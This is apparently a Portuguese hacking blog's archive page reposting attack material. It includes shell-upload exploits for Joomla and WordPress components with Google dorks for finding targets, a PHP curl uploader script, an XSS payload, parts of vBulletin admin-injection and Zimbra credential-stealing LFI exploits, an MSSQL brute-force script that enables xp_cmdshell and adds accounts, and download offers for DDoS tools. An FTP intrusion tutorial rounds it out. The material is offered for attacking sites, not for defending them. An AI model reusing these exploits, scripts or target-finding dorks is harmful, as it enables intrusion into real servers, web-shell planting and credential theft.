Pular para o conteúdo principal

Postagens

Mostrando postagens de janeiro, 2014

Joomla com_aclassfb File Upload Vulnerability

#Title : Joomla com_aclassfb File Upload Vulnerability #Author : DevilScreaM #Category : Web Applications #Vendor : http://www.almondsoft.com #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : File Upload #Dork : inurl:com_aclassfb File Upload http://127.0.0.1/index.php?option=com_aclassfb Exploit : http://127.0.0.1/index.php?option=com_aclassfb&Itemid= [ID]&ct=[CATEGORY]&md=add_form POC : 1. Select Category 2. After Select Category, Click “Post New Ad” http://127.0.0.1/index.php?option=com_aclassfb&Itemid= [ID]&ct=[CATEGORY]&md=add_form 3. Upload Your Shell extension : .php .php.jpg / etc Shell Access : http://127.0.0.1/component/com_aclassfb/photos/ Encontre sua shell.

WordPress DailyDeal Themes Shell Upload Vulnerabillity

#Title : WordPress DailyDeal Themes Shell Upload Vulnerabillity #Author : DevilScreaM #Vulnerabillity : Shell Upload #Dork : inurl:wp-content/themes/DailyDeal/ Exploit & POC http://site-target/wp-content/themes/DailyDeal/monetize/upload/ Resultado Upload http://site-target/wp-content/uploads/[years]/[months]/[Find_your_shell].php Exemplo : http://vulnsite.com/wp-content/themes/Da...ze/upload/ Clique em Procurar, e escolha o seu shell .. :)

Tutorial - Noções básicas de Footprinting

O que é isso ? Footprinting é o ato que é realizado para reunir informações sobre um sistema de computador. Este é o primeiro passo no processo de hacking ético. Isto irá permitir-nos aprender tudo possível sobre o sistema antes de avançar. Maneiras de coletar informações 1. As primeiras coisas para tentar encontrar seria e-mails e nomes no site de destino. Se um atacante deseja tentar realizar um ataque de engenharia social, então esta informação será muito útil. 2. O próximo passo é obter o endereço IP do site. Existe muitos sites que permitem que você insira uma URL do site e ele vai te mostrar o IP. Um site que eu costumo usar é :  http://www.yougetsignal.com/tools/web-sites-on-web-server/ Como você pode ver acima neste site também irá mostrar todos os outros sites no mesmo servidor web, porem nesse ip existe apenas 2. 3. O terceiro passo é fazer o ping do servidor para se certificar de que está ON. Usando um site como o http://cloudmonitor.ca.com/en/ping.ph

Madness DDoS Bot 1.13

Baixar

Wordpress Averin Themes Arbitrary File Upload

#Title : Wordpress Averin Themes Arbitrary File Upload #Author : DevilScreaM #Vendor : http://themeforest.net/ #Link : http://themeforest.net/item/averin-premi...eme/388778 #Vulnerabillity : Arbitrary File Upload #Dork : inurl:wp-content/themes/averin/ Exploit and Script : <?php $uploadfile="devilscream.php"; $ch = curl_init("http://site-target/wp-content/themes/averin/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/themes/averin/js/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

NETRA - "Prism " Um sistema de espionagem Internet a ser lançado pelo Governo indiano

Pense duas vezes antes de usar palavras como "bomba", "explosão", "matar", "ataque" em seus e-mails, blogs, tweets, status no Facebook ou qualquer outra rede de atualizações de status social. Usando esse tipo de palavras vai colocá-lo sob uma vigilância das agências de segurança indianas. "NETRA", é um sistema de espionagem Internet, desenvolvido pelo Centro de Inteligência Artificial e Robótica (CAIR), um laboratório no âmbito da Investigação de Defesa e Organização de Desenvolvimento (DRDO), que é capaz de detectar mensagem fide mala, relata Times of India . Além estado atualização em redes sociais, o projeto NETRA é capaz de capturar todo o tráfego de voz duvidosa passando serviços de VOIP completas como o Skype ou o Google Talk. "Quando Netra é operacionalizada, agências de segurança vai ter um grande controle sobre as atividades de monitoramento de pessoas duvidosas e organizações que uso Internet para realizar seus pro

Wordpress Spreadsheet Plugin Cross Site Scripting

Wordpress spreadsheet Plugin Cross site scripting #*******************************************************************************​* # Exploit Title : Wordpress spreadsheet Plugin Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Software Link : http://downloads.wordpress.org/plugin/dh...et.2.0.zip # # Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet # # Tested on: Windows 7 , Linux ------------------------------------------------------------------- # Exploit : Cross site scripting # # Location : [Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss] # # Script For Test : <script>alert(1);</script> ###################### # Example: # # http://www.vulnsite.com/wp-content/plugi...(1);</script>

Exploit vBulletin versões 4.1.x e 5.xx

vBulletin versões 4.1.xe 5.xx sofre de uma vulnerabilidade de injeção de usuário administrativo remoto não autenticado via upgrade.php. #!/usr/bin/perl # # Title: vBulletin remote admin injection exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Coded: 17 September 2013 # Published: 24 October 2013 # MorXploit Research # http://www.MorXploit.com # # Vendor: vBulletin (www.vbulletin.com) # Version: 4.1.x / 5.x.x # Vulnerability: Remote admin injection # Severity: High # Status: Confirmed # # Exploit code description: # Perl code to inject a new admin account through upgrade.php script. # # Vulnerability details: # upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading # it only requires the customer number which can be extracted through the same script source code. # # Fix: # Rename or delete the install folder until a fix is rel

Script Brute Force SQL

O objetivo deste roteiro é a realização de um ataque de força bruta em um script SQL database.O script tentará se conectar ao host remoto com a conta administrativa  e com uma senha que será válida a partir do arquivo pass.txt.If, se conexão for bem sucedido, então ele vai tentar ativar o xp_cmdshell e adicionar um novo usuário no host remoto. Autor: Larry Spohn Segue Script : #!/usr/bin/python import _mssql # mssql = _mssql.connect('ip', 'username', 'password') # mssql.execute_query() passwords = file("pass.txt", "r") ip = "192.168.200.128" for password in passwords: password = password.rstrip() try: mssql = _mssql.connect(ip, "sa", password) print "[*] Successful login with username 'sa' and password: " + password print "[*] Enabling 'xp_cmdshell'" mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec

Tools: Zimbra 0day - LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.zimbra.com/ # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected, # Tested on: Centos(x), Ubuntu. # CVE : No CVE, no patch just 0Day # State : Critical # Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip ---------------Description----------------- This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies and gain acces to the Administration Console. LFI is located at : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin

LOIC

Descrição  Low Orbit Ion Canhão O projeto só continua e manutenções (fixação bug) no código escrito pelo autor original - Praetox, mas não é associado ou relacionado com ele. IMPORTANTE: O USO DE SUA CONTA E RISCO. ESTE SOFTWARE É FORNECIDO PELO TITULAR OU SEUS COLABORADORES COPYRIGHT "COMO ESTÁ" E QUALQUER GARANTIA EXPRESSA OU IMPLÍCITA, INCLUINDO, SEM LIMITAÇÃO, AS GARANTIAS DE COMERCIALIZAÇÃO E ADEQUAÇÃO A UM DETERMINADO PROPÓSITO. EM NENHUM CASO SERÁ O TITULAR OU SEUS COLABORADORES COPYRIGHT SERÁ RESPONSÁVEL POR QUAISQUER DANOS DIRETOS, indiretos, incidentais, especiais, exemplares ou consequentes. BAIXAR LINK SEGURO DIRETO DESENVOLVEDOR

Port Scan X Port Scanning ou Port Scanner ?

Um port scanner (scanner de porta) é uma ferramenta que tem como objetivo testar portas de um determinado host, para determinar quais destas portas estão abertas, filtradas e serviço sendo executado na porta indicada. Só isso? Não, essa ferramenta possui alguns recursos adicionais, sendo assim, vamos a uma pequena lista: Nmap é um PostScan de uso geral, sua utilidade vai desde um escaneamento rápido até uma varredura de portas mais detalhada. Por ser muito conhecido e utilizado, o Nmap está disponível para a grande maioria das distribuições Linux, sistemas Windows e até mesmo sistemas BSD. Netcat é uma ferramenta de rede disponível para sistemas Linux, Unix, Windows entre outros. Através de sua sintaxe é possível forçar conexões UDP/TCP em hosts da rede e consequentemente fazer o levantamento de portas “abertas” e “fechadas”, ou realizar transferências de arquivo bit a bit entre os hosts da rede. Xprobe é utilizado para identificar hosts remotos, ele utiliza diversos protocolos,

Invadindo FTP Com Exploit

Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesma técnica para invadir Telnet, SSH entre outros. A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação. Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo. Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar: nmap -v -sV -sC -O host Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo. Veja o sistema operaciona. Feito isso agora vamos usar o exploit em python. http://www.securiteam.com/exploits/5WP0C2AJ5W.html Aqui você deve configurar ele: host = "127.0.0.1" // O